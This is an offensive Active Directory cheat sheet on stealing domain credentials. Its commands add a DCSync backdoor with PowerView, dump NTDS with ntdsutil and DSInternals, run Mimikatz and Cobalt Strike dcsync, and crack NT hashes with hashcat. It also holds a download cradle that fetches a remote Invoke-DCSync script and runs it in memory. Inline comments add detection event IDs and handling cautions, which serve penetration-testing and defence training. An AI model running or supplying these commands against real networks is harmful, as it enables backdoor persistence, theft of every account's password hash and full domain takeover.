DCSync Backdoor

# Enumerate
# Lists every ACE on the domain head (DC=Marvel,DC=local) whose extended right
# name matches "DS-Replication" (Get-Changes / Get-Changes-All). Together those
# two rights let a principal pull password hashes through the replication
# protocol, so every SecurityIdentifier returned here that is not one of the
# built-in DC/admin groups is a standing DCSync backdoor and should be reviewed.
# Note -ResolveGUIDs is required: without it ObjectAceType is a raw GUID and the
# -match below finds nothing.
Get-DomainObjectAcl -ResolveGUIDs | where {$_.ObjectDN -eq "DC=Marvel,DC=local" -and $_.ObjectAceType -match "DS-Replication"} | select ActiveDirectoryRights,ObjectAceType,SecurityIdentifier 

# Command
# Grants user4 the replication rights on the domain object (the "DCSync" rights
# bundle PowerView expands). Defender note: this is an nTSecurityDescriptor write
# on the domain head; with Directory Service Changes auditing and a SACL on the
# object it surfaces as event 5136, and later use of the right surfaces as 4662
# with the DS-Replication GUIDs from a source that is not a domain controller.
Add-DomainObjectAcl -TargetIdentity "DC=marvel,DC=local" -PrincipalIdentity user4 -Rights DCSync

beacon> dcsync dev.cyberbotic.io DEV\krbtgt

NTDS Dump

NTDSutil

ntdsutil
activate instance ntds
ifm
create full C:\audit
quit
quit

Then use the DSInternals module to extract all the hashes from this dump.

# https://github.com/MichaelGrafnetter/DSInternals/releases/latest

# Offline extraction from the IFM export created above. The export contains the
# database (ntds.dit) and the registry hives; the SYSTEM hive supplies the boot
# key that DSInternals needs to decrypt the hashes stored in the database.
Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHiveFilePath '.\audit\registry\SYSTEM'
# Reads every account (-All) and writes them in the HashcatNT view, i.e. one NT
# hash per line in the shape hashcat -m 1000 expects; -Encoding ascii avoids the
# UTF-16 BOM Out-File would otherwise emit. hashes.txt and the C:\audit export
# now hold the credentials of every account in the domain, krbtgt included, and
# must be handled and destroyed with the same care as the DC itself.
Get-ADDBAccount -All -DBPath '.\audit\Active Directory\ntds.dit' -BootKey $key | Format-Custom -View HashcatNT | Out-File hashes.txt -Encoding ascii

Mimikatz

lsadump::dcsync /domain:marvel.local /all /csv

Invoke DCSync

# https://gist.githubusercontent.com/monoxgas/9d238accd969550136db/raw/7806cc26744b6025e8f1daf616bc359cb6a11965/Invoke-DCSync.ps1

# Download cradle: fetches the script over HTTPS and runs it in memory with IEX.
# The URL is pinned to one gist revision, which is good for reproducibility, but
# nothing checks the downloaded content against a known hash, so whoever can
# alter the response gets code execution in this session. Defender note: the
# IEX + DownloadString pattern is exactly what PowerShell script block logging
# (event 4104) and AMSI are designed to surface.
IEX (New-Object Net.WebClient).DownloadString("https://gist.githubusercontent.com/monoxgas/9d238accd969550136db/raw/7806cc26744b6025e8f1daf616bc359cb6a11965/Invoke-DCSync.ps1");
# Replicates account secrets from a DC; -PWDumpFormat presumably prints them in
# pwdump (user:rid:lm:nt) layout — confirm against the script before relying on it.
# The request itself is a normal DRS replication call, so the detection signal is
# a 4662 with the DS-Replication GUIDs whose source is not a domain controller.
Invoke-DCSync -PWDumpFormat

Cracking

# Offline cracking: -m 1000 is hashcat's NTLM (NT hash) mode, -a 0 a straight
# wordlist attack, here rockyou.txt against the hashes extracted above. Every
# password recovered is a weak-password finding for that account; the hashes
# having left the DC at all is the more serious one and the reason the export
# and hashes.txt need controlled handling.
hashcat.exe -m 1000 -a 0 hashes.txt rockyou.txt
